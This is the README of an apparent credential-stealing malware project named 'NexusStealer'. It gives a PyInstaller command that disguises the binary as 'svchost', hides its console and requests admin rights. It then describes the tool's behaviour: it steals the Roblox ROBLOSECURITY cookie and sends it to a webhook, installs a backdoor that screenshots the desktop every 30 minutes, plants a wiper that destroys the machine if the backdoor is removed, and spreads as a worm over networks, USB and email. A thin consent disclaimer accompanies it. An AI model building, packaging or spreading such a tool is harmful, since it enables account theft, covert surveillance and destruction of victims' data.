Nezurite/NexusStealer/README.md

 ```
 pyinstaller --onefile --noconsole --hidden-import psutil --hidden-import requests --hidden-import pywin32 --hidden-import pyautogui --hidden-import cryptography --hidden-import netifaces --hidden-import win32crypt --hidden-import win32gui --hidden-import win32con --hidden-import win32process --hidden-import win32security --hidden-import win32api --hidden-import win32file --uac-admin --name svchost NexusStealer.py
 ```

+---

+## Explanation

+When executed on a machine, the script will wait for a **Roblox Related** application to be oppened, will then search the whole computer data and browser data in search of the roblox login cookie (ROBLOSECURITY).
+Once found, it will send the cookie to the designed webhook, leave behind him a backdoor that will send a screenshot of the user desktop **every 30 Minutes** and another logic bomb that will continuisly check to see if the backdoor has been deleted, if yes, it will wipe the whole user computer from top to bottom.

+***DO NOT RUN THIS SCRIPT ON YOUR OWN MACHINE OR ON SOMEONE ELSE MACHINE WITHOUT THEIR CONSENT*** **Ive implemented a WORM in the script, meaning that it will spread through the network, usb and emails.
+Please be cautious of the uses of this script.**